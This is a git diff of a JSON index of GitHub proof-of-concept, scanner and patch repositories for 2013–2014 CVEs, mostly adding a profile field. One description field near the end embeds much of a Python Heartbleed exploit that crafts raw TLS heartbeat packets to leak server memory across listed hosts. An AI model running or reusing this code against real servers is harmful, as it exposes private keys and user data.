"https:\/\/avatars.githubusercontent.com\/u\/180197370?v=4", - "html_url": "https:\/\/github.com\/requiempentest" + "html_url": "https:\/\/github.com\/requiempentest", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/requiempentest\/NTP_CVE-2013-5211", "description": "Exploit and check CVE-2013-5211", diff --git a/2013/CVE-2013-5664.json b/2013/CVE-2013-5664.json index fac45b54dc..5c2bd7f8de 100644 --- a/2013/CVE-2013-5664.json +++ b/2013/CVE-2013-5664.json @@ -7,7 +7,8 @@ "login": "phusion", "id": 830588, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/830588?v=4", - "html_url": "https:\/\/github.com\/phusion" + "html_url": "https:\/\/github.com\/phusion", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/phusion\/rails-cve-2012-5664-test", "description": "Demo app showing how the Rails CVE-2013-5664 vulnerability works.", diff --git a/2013/CVE-2013-5842.json b/2013/CVE-2013-5842.json index 92a3ff9e85..7b3568d2fa 100644 --- a/2013/CVE-2013-5842.json +++ b/2013/CVE-2013-5842.json @@ -7,7 +7,8 @@ "login": "guhe120", "id": 5601255, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5601255?v=4", - "html_url": "https:\/\/github.com\/guhe120" + "html_url": "https:\/\/github.com\/guhe120", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/guhe120\/CVE-2013-5842", "description": null, diff --git a/2013/CVE-2013-6117.json b/2013/CVE-2013-6117.json index abd6c01f9d..48e1427adb 100644 --- a/2013/CVE-2013-6117.json +++ b/2013/CVE-2013-6117.json @@ -7,7 +7,8 @@ "login": "milo2012", "id": 905335, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/905335?v=4", - "html_url": "https:\/\/github.com\/milo2012" + "html_url": "https:\/\/github.com\/milo2012", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/milo2012\/CVE-2013-6117", "description": "CVE-2013-6117", diff --git a/2013/CVE-2013-6282.json b/2013/CVE-2013-6282.json index df81cf9732..b0bf0fd357 100644 --- a/2013/CVE-2013-6282.json +++ b/2013/CVE-2013-6282.json @@ -7,7 +7,8 @@ "login": "fi01", "id": 3073214, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3073214?v=4", - "html_url": "https:\/\/github.com\/fi01" + "html_url": "https:\/\/github.com\/fi01", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fi01\/libput_user_exploit", "description": "CVE-2013-6282 exploit", @@ -37,7 +38,8 @@ "login": "fi01", "id": 3073214, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3073214?v=4", - "html_url": "https:\/\/github.com\/fi01" + "html_url": "https:\/\/github.com\/fi01", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fi01\/libget_user_exploit", "description": "CVE-2013-6282 exploit", @@ -67,7 +69,8 @@ "login": "jeboo", "id": 1755205, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1755205?v=4", - "html_url": "https:\/\/github.com\/jeboo" + "html_url": "https:\/\/github.com\/jeboo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/jeboo\/bypasslkm", "description": "Using CVE-2013-6282 to bypass Samsung kernel module authentication", @@ -97,7 +100,8 @@ "login": "timwr", "id": 684924, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/684924?v=4", - "html_url": "https:\/\/github.com\/timwr" + "html_url": "https:\/\/github.com\/timwr", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/timwr\/CVE-2013-6282", "description": "CVE-2013-6282 proof of concept for Android", diff --git a/2013/CVE-2013-6375.json b/2013/CVE-2013-6375.json index 74a22de26d..029708aff4 100644 --- a/2013/CVE-2013-6375.json +++ b/2013/CVE-2013-6375.json @@ -7,7 +7,8 @@ "login": "bl4ck5un", "id": 2434648, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2434648?v=4", - "html_url": "https:\/\/github.com\/bl4ck5un" + "html_url": "https:\/\/github.com\/bl4ck5un", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bl4ck5un\/cve-2013-6375", "description": "Xen 4.2.x and 4.3.x, when using Intel VT-d for PCI passthrough, does not properly flush the TLB after clearing a present translation table entry, which allows local guest administrators to cause a denial of service or gain privileges via unspecified vectors related to an \"inverted boolean parameter.\"", diff --git a/2013/CVE-2013-6490.json b/2013/CVE-2013-6490.json index 14ecd62b0d..786b0fc8f3 100644 --- a/2013/CVE-2013-6490.json +++ b/2013/CVE-2013-6490.json @@ -7,7 +7,8 @@ "login": "Everdoh", "id": 17012809, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17012809?v=4", - "html_url": "https:\/\/github.com\/Everdoh" + "html_url": "https:\/\/github.com\/Everdoh", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Everdoh\/CVE-2013-6490", "description": null, diff --git a/2013/CVE-2013-6668.json b/2013/CVE-2013-6668.json index 0591bda6a2..cd0289d10c 100644 --- a/2013/CVE-2013-6668.json +++ b/2013/CVE-2013-6668.json @@ -7,7 +7,8 @@ "login": "sdneon", "id": 8720479, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8720479?v=4", - "html_url": "https:\/\/github.com\/sdneon" + "html_url": "https:\/\/github.com\/sdneon", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sdneon\/CveTest", "description": "Test case for Node.JS V0.10.31 v8 backport CVE-2013-6668 crash", diff --git a/2013/CVE-2013-6987.json b/2013/CVE-2013-6987.json index 18dae8cf81..1ae0be7675 100644 --- a/2013/CVE-2013-6987.json +++ b/2013/CVE-2013-6987.json @@ -7,7 +7,8 @@ "login": "stoicboomer", "id": 45523448, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45523448?v=4", - "html_url": "https:\/\/github.com\/stoicboomer" + "html_url": "https:\/\/github.com\/stoicboomer", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/stoicboomer\/CVE-2013-6987", "description": "exploit for DNS 4.3", diff --git a/2014/CVE-2014-0038.json b/2014/CVE-2014-0038.json index cd9bb465c1..27ad74c86a 100644 --- a/2014/CVE-2014-0038.json +++ b/2014/CVE-2014-0038.json @@ -7,7 +7,8 @@ "login": "saelo", "id": 2453290, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2453290?v=4", - "html_url": "https:\/\/github.com\/saelo" + "html_url": "https:\/\/github.com\/saelo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/saelo\/cve-2014-0038", "description": "Linux local root exploit for CVE-2014-0038", @@ -41,7 +42,8 @@ "login": "kiruthikan99", "id": 64960253, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64960253?v=4", - "html_url": "https:\/\/github.com\/kiruthikan99" + "html_url": "https:\/\/github.com\/kiruthikan99", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/kiruthikan99\/IT19115276", "description": "SNP Assignment 1 Report - Linux box exploitation ( Vulnerability CVE-2014-0038)", diff --git a/2014/CVE-2014-0043.json b/2014/CVE-2014-0043.json index 1354d9b4e3..adbdbee3ae 100644 --- a/2014/CVE-2014-0043.json +++ b/2014/CVE-2014-0043.json @@ -7,7 +7,8 @@ "login": "JJK96", "id": 11193274, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11193274?v=4", - "html_url": "https:\/\/github.com\/JJK96" + "html_url": "https:\/\/github.com\/JJK96", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/JJK96\/JavaClasspathEnum", "description": "Java classpath enumeration, focussed on CVE-2014-0043 for Apache Wicket 6.x", diff --git a/2014/CVE-2014-0050.json b/2014/CVE-2014-0050.json index 14262642c3..2351813668 100644 --- a/2014/CVE-2014-0050.json +++ b/2014/CVE-2014-0050.json @@ -7,7 +7,8 @@ "login": "jrrdev", "id": 17674081, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17674081?v=4", - "html_url": "https:\/\/github.com\/jrrdev" + "html_url": "https:\/\/github.com\/jrrdev", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/jrrdev\/cve-2014-0050", "description": "CVE-2014-0050 Vulnerable site sample", diff --git a/2014/CVE-2014-0094.json b/2014/CVE-2014-0094.json index c3f9287050..becc8a0ba1 100644 --- a/2014/CVE-2014-0094.json +++ b/2014/CVE-2014-0094.json @@ -7,7 +7,8 @@ "login": "HasegawaTadamitsu", "id": 128817, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128817?v=4", - "html_url": "https:\/\/github.com\/HasegawaTadamitsu" + "html_url": "https:\/\/github.com\/HasegawaTadamitsu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/HasegawaTadamitsu\/CVE-2014-0094-test-program-for-struts1", "description": "CVE-2014-0094 test program for struts1", @@ -37,7 +38,8 @@ "login": "y0d3n", "id": 51740737, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51740737?v=4", - "html_url": "https:\/\/github.com\/y0d3n" + "html_url": "https:\/\/github.com\/y0d3n", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/y0d3n\/CVE-2014-0094", "description": null, diff --git a/2014/CVE-2014-0114.json b/2014/CVE-2014-0114.json index c671bc596e..e311eac19e 100644 --- a/2014/CVE-2014-0114.json +++ b/2014/CVE-2014-0114.json @@ -7,7 +7,8 @@ "login": "rgielen", "id": 64990, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64990?v=4", - "html_url": "https:\/\/github.com\/rgielen" + "html_url": "https:\/\/github.com\/rgielen", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/rgielen\/struts1filter", "description": "A request parameter filter solution for Struts 1 CVE-2014-0114 based on the work of Alvaro Munoz and the HP Fortify team", @@ -37,7 +38,8 @@ "login": "ricedu", "id": 7359760, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7359760?v=4", - "html_url": "https:\/\/github.com\/ricedu" + "html_url": "https:\/\/github.com\/ricedu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ricedu\/struts1-patch", "description": "struts1 CVE-2014-0114 classLoader manipulation vulnerability patch", @@ -67,7 +69,8 @@ "login": "aenlr", "id": 33195524, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33195524?v=4", - "html_url": "https:\/\/github.com\/aenlr" + "html_url": "https:\/\/github.com\/aenlr", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/aenlr\/strutt-cve-2014-0114", "description": null, diff --git a/2014/CVE-2014-0130.json b/2014/CVE-2014-0130.json index ae3acc53e8..1ee6938aaf 100644 --- a/2014/CVE-2014-0130.json +++ b/2014/CVE-2014-0130.json @@ -7,7 +7,8 @@ "login": "omarkurt", "id": 1712468, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1712468?v=4", - "html_url": "https:\/\/github.com\/omarkurt" + "html_url": "https:\/\/github.com\/omarkurt", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/omarkurt\/cve-2014-0130", "description": "cve-2014-0130 rails directory traversal vuln", diff --git a/2014/CVE-2014-0160.json b/2014/CVE-2014-0160.json index 2248458d91..e2a765efdc 100644 --- a/2014/CVE-2014-0160.json +++ b/2014/CVE-2014-0160.json @@ -7,7 +7,8 @@ "login": "FiloSottile", "id": 1225294, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1225294?v=4", - "html_url": "https:\/\/github.com\/FiloSottile" + "html_url": "https:\/\/github.com\/FiloSottile", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/FiloSottile\/Heartbleed", "description": "A checker (site and tool) for CVE-2014-0160", @@ -37,7 +38,8 @@ "login": "titanous", "id": 13026, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13026?v=4", - "html_url": "https:\/\/github.com\/titanous" + "html_url": "https:\/\/github.com\/titanous", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/titanous\/heartbleeder", "description": "OpenSSL CVE-2014-0160 Heartbleed vulnerability test", @@ -67,7 +69,8 @@ "login": "DominikTo", "id": 1384635, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1384635?v=4", - "html_url": "https:\/\/github.com\/DominikTo" + "html_url": "https:\/\/github.com\/DominikTo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/DominikTo\/bleed", "description": "bleed is a tool to test servers for the 'Heartbleed' vulnerability (CVE-2014-0160).", @@ -97,7 +100,8 @@ "login": "cyphar", "id": 2888411, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2888411?v=4", - "html_url": "https:\/\/github.com\/cyphar" + "html_url": "https:\/\/github.com\/cyphar", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cyphar\/heartthreader", "description": "Mass, multithreaded testing for servers against Heartbleed (CVE-2014-0160).", @@ -127,7 +131,8 @@ "login": "jdauphant", "id": 1238254, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1238254?v=4", - "html_url": "https:\/\/github.com\/jdauphant" + "html_url": "https:\/\/github.com\/jdauphant", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/jdauphant\/patch-openssl-CVE-2014-0160", "description": "Patch openssl #heartbleed with ansible ", @@ -157,7 +162,8 @@ "login": "musalbas", "id": 5038597, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5038597?v=4", - "html_url": "https:\/\/github.com\/musalbas" + "html_url": "https:\/\/github.com\/musalbas", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/musalbas\/heartbleed-masstest", "description": "Multi-threaded tool for scanning many hosts for CVE-2014-0160.", @@ -187,7 +193,8 @@ "login": "obayesshelton", "id": 628720, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/628720?v=4", - "html_url": "https:\/\/github.com\/obayesshelton" + "html_url": "https:\/\/github.com\/obayesshelton", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/obayesshelton\/CVE-2014-0160-Scanner", "description": null, @@ -217,7 +224,8 @@ "login": "Lekensteyn", "id": 164530, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164530?v=4", - "html_url": "https:\/\/github.com\/Lekensteyn" + "html_url": "https:\/\/github.com\/Lekensteyn", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Lekensteyn\/pacemaker", "description": "Heartbleed (CVE-2014-0160) client exploit", @@ -247,7 +255,8 @@ "login": "isgroup", "id": 8706498, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8706498?v=4", - "html_url": "https:\/\/github.com\/isgroup" + "html_url": "https:\/\/github.com\/isgroup", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/isgroup\/openmagic", "description": "OpenSSL TLS heartbeat read overrun (CVE-2014-0160)", @@ -277,7 +286,8 @@ "login": "fb1h2s", "id": 2658510, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2658510?v=4", - "html_url": "https:\/\/github.com\/fb1h2s" + "html_url": "https:\/\/github.com\/fb1h2s", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fb1h2s\/CVE-2014-0160", "description": "openssl Heart Bleed Exploit: CVE-2014-0160 Mass Security Auditor", @@ -307,7 +317,8 @@ "login": "takeshixx", "id": 5837896, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837896?v=4", - "html_url": "https:\/\/github.com\/takeshixx" + "html_url": "https:\/\/github.com\/takeshixx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/takeshixx\/ssl-heartbleed.nse", "description": "Nmap NSE script that discovers\/exploits Heartbleed\/CVE-2014-0160", @@ -337,7 +348,8 @@ "login": "roganartu", "id": 1133705, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1133705?v=4", - "html_url": "https:\/\/github.com\/roganartu" + "html_url": "https:\/\/github.com\/roganartu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/roganartu\/heartbleedchecker-chrome", "description": "Chrome extension that automatically checks visited sites for vulnerability to OpenSSL CVE-2014-0160", @@ -367,7 +379,8 @@ "login": "zouguangxian", "id": 863281, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/863281?v=4", - "html_url": "https:\/\/github.com\/zouguangxian" + "html_url": "https:\/\/github.com\/zouguangxian", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zouguangxian\/heartbleed", "description": "Checks for vulnerabilities: CVE-2014-0160 ", @@ -397,7 +410,8 @@ "login": "sensepost", "id": 1193973, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1193973?v=4", - "html_url": "https:\/\/github.com\/sensepost" + "html_url": "https:\/\/github.com\/sensepost", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sensepost\/heartbleed-poc", "description": "Test for SSL heartbeat vulnerability (CVE-2014-0160)", @@ -427,7 +441,8 @@ "login": "proactiveRISK", "id": 7243071, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7243071?v=4", - "html_url": "https:\/\/github.com\/proactiveRISK" + "html_url": "https:\/\/github.com\/proactiveRISK", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/proactiveRISK\/heartbleed-extention", "description": "A firefox extension and checker for CVE-2014-0160", @@ -457,7 +472,8 @@ "login": "amerine", "id": 1016, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1016?v=4", - "html_url": "https:\/\/github.com\/amerine" + "html_url": "https:\/\/github.com\/amerine", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/amerine\/coronary", "description": "Test CIDR blocks for CVE-2014-0160\/Heartbleed", @@ -487,7 +503,8 @@ "login": "0x90", "id": 806042, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/806042?v=4", - "html_url": "https:\/\/github.com\/0x90" + "html_url": "https:\/\/github.com\/0x90", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0x90\/CVE-2014-0160", "description": "Heartbleed variants", @@ -517,7 +534,8 @@ "login": "ice-security88", "id": 7246782, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7246782?v=4", - "html_url": "https:\/\/github.com\/ice-security88" + "html_url": "https:\/\/github.com\/ice-security88", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ice-security88\/CVE-2014-0160", "description": null, @@ -547,7 +565,8 @@ "login": "waqasjamal-zz", "id": 2502430, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2502430?v=4", - "html_url": "https:\/\/github.com\/waqasjamal-zz" + "html_url": "https:\/\/github.com\/waqasjamal-zz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/waqasjamal-zz\/HeartBleed-Vulnerability-Checker", "description": "This repo contains a script to automatically test sites for vulnerability to the Heartbleed Bug (CVE-2014-0160) based on the input file for the urls.", @@ -577,7 +596,8 @@ "login": "siddolo", "id": 2439981, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2439981?v=4", - "html_url": "https:\/\/github.com\/siddolo" + "html_url": "https:\/\/github.com\/siddolo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/siddolo\/knockbleed", "description": "CVE-2014-0160 mass test against subdomains", @@ -607,7 +627,8 @@ "login": "sammyfung", "id": 50470, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50470?v=4", - "html_url": "https:\/\/github.com\/sammyfung" + "html_url": "https:\/\/github.com\/sammyfung", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sammyfung\/openssl-heartbleed-fix", "description": "OpenSSL Heartbleed (CVE-2014-0160) Fix script", @@ -637,7 +658,8 @@ "login": "a0726h77", "id": 127018, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127018?v=4", - "html_url": "https:\/\/github.com\/a0726h77" + "html_url": "https:\/\/github.com\/a0726h77", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/a0726h77\/heartbleed-test", "description": "CVE-2014-0160 scanner", @@ -667,7 +689,8 @@ "login": "pblittle", "id": 21940, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21940?v=4", - "html_url": "https:\/\/github.com\/pblittle" + "html_url": "https:\/\/github.com\/pblittle", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pblittle\/aws-suture", "description": "OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner.", @@ -701,7 +724,8 @@ "login": "hreese", "id": 892400, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/892400?v=4", - "html_url": "https:\/\/github.com\/hreese" + "html_url": "https:\/\/github.com\/hreese", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hreese\/heartbleed-dtls", "description": "POC for CVE-2014-0160 (Heartbleed) for DTLS", @@ -731,7 +755,8 @@ "login": "wwwiretap", "id": 210109, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/210109?v=4", - "html_url": "https:\/\/github.com\/wwwiretap" + "html_url": "https:\/\/github.com\/wwwiretap", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/wwwiretap\/bleeding_onions", "description": "Script to find Exit and Guard nodes in the Tor Network, that are still suffering from CVE-2014-0160", @@ -761,7 +786,8 @@ "login": "idkqh7", "id": 2221840, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2221840?v=4", - "html_url": "https:\/\/github.com\/idkqh7" + "html_url": "https:\/\/github.com\/idkqh7", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/idkqh7\/heatbleeding", "description": "Test script for test 1Password database for SSL Hea(r)t Bleeding (CVE-2014-0160)", @@ -791,7 +817,8 @@ "login": "GeeksXtreme", "id": 5917335, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5917335?v=4", - "html_url": "https:\/\/github.com\/GeeksXtreme" + "html_url": "https:\/\/github.com\/GeeksXtreme", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/GeeksXtreme\/ssl-heartbleed.nse", "description": "Nmap NSE script that discovers\/exploits Heartbleed\/CVE-2014-0160.", @@ -821,7 +848,8 @@ "login": "xlucas", "id": 2470398, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2470398?v=4", - "html_url": "https:\/\/github.com\/xlucas" + "html_url": "https:\/\/github.com\/xlucas", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xlucas\/heartbleed", "description": "A research tool designed to check for OpenSSL CVE-2014-0160 vulnerability", @@ -851,7 +879,8 @@ "login": "indiw0rm", "id": 7300510, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7300510?v=4", - "html_url": "https:\/\/github.com\/indiw0rm" + "html_url": "https:\/\/github.com\/indiw0rm", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/indiw0rm\/-Heartbleed-", "description": "A checker (site and tool) for CVE-2014-0160: ", @@ -881,7 +910,8 @@ "login": "einaros", "id": 394360, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/394360?v=4", - "html_url": "https:\/\/github.com\/einaros" + "html_url": "https:\/\/github.com\/einaros", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/einaros\/heartbleed-tools", "description": "OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner, data miner and RSA key-restore tools.", @@ -911,7 +941,8 @@ "login": "mozilla-services", "id": 1066228, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1066228?v=4", - "html_url": "https:\/\/github.com\/mozilla-services" + "html_url": "https:\/\/github.com\/mozilla-services", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mozilla-services\/Heartbleed", "description": "A checker (site and tool) for CVE-2014-0160", @@ -941,7 +972,8 @@ "login": "yryz", "id": 1646732, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1646732?v=4", - "html_url": "https:\/\/github.com\/yryz" + "html_url": "https:\/\/github.com\/yryz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/yryz\/heartbleed.js", "description": "openssl Heartbleed bug(CVE-2014-0160) check for Node.js ", @@ -976,7 +1008,8 @@ "login": "DisK0nn3cT", "id": 727064, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/727064?v=4", - "html_url": "https:\/\/github.com\/DisK0nn3cT" + "html_url": "https:\/\/github.com\/DisK0nn3cT", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/DisK0nn3cT\/MaltegoHeartbleed", "description": "Maltego transform to detect the OpenSSL Heartbleed vulnerability (CVE-2014-0160)", @@ -1006,7 +1039,8 @@ "login": "OffensivePython", "id": 6576532, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6576532?v=4", - "html_url": "https:\/\/github.com\/OffensivePython" + "html_url": "https:\/\/github.com\/OffensivePython", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/OffensivePython\/HeartLeak", "description": "CVE-2014-0160 (Heartbeat Buffer over-read bug)", @@ -1036,7 +1070,8 @@ "login": "vortextube", "id": 7092728, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7092728?v=4", - "html_url": "https:\/\/github.com\/vortextube" + "html_url": "https:\/\/github.com\/vortextube", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/vortextube\/ssl_scanner", "description": "Heartbleed (CVE-2014-0160) SSLv3 Scanner", @@ -1066,7 +1101,8 @@ "login": "mpgn", "id": 5891788, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", - "html_url": "https:\/\/github.com\/mpgn" + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mpgn\/heartbleed-PoC", "description": ":broken_heart: Hearbleed exploit to retrieve sensitive information CVE-2014-0160 :broken_heart:", @@ -1096,7 +1132,8 @@ "login": "xanas", "id": 11810462, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11810462?v=4", - "html_url": "https:\/\/github.com\/xanas" + "html_url": "https:\/\/github.com\/xanas", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xanas\/heartbleed.py", "description": "#!\/usr\/bin\/python # Modified by Travis Lee # -changed output to display text only instead of hexdump and made it easier to read # -added option to specify number of times to connect to server (to get more data) # -added option to specify TLS version # -added option to send STARTTLS command for use with SMTP\/POP\/IMAP\/FTP\/etc... # -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port) # -added option to have verbose output # -added capability to automatically check if STARTTLS\/STLS\/AUTH TLS is supported when smtp\/pop\/imap\/ftp ports are entered and automatically send appropriate command # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect\/loop (default: 1)') options.add_option('-t', '--tls', type='int', default=1, help='Specify TLS version: 0 = 1.0, 1 = 1.1, 2 = 1.2 (default: 1)') options.add_option('-s', '--starttls', action=\"store_true\", dest=\"starttls\", help='Issue STARTTLS command for SMTP\/POP\/IMAP\/FTP\/etc...') options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port') options.add_option('-v', '--verbose', action=\"store_true\", dest=\"verbose\", help='Enable verbose output') opts, args = options.parse_args() def h2bin(x): return x.replace(' ', '').replace('\\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') # set TLS version if opts.tls == 0: hb = h2bin('''18 03 01 00 03 01 40 00''') elif opts.tls == 1: hb = h2bin('''18 03 02 00 03 01 40 00''') elif opts.tls == 2: hb = h2bin('''18 03 03 00 03 01 40 00''') else: hb = h2bin('''18 03 02 00 03 01 40 00''') def hexdump(s): pdat = '' for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] #hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin) \t#print ' %04x: %-48s %s' % (b, hxdat, pdat) \tpdat = re.sub(r'([.]{50,})', '', pdat) return pdat def recvall(s, length, timeout=5): try: endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata except: print \"Error receiving data: \", sys.exc_info()[0] def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None if opts.verbose: print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s, targ): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return '' if typ == 24: if opts.verbose: print 'Received heartbeat response...' #hexdump(pay) if len(pay) > 3: print 'WARNING: ' + targ + 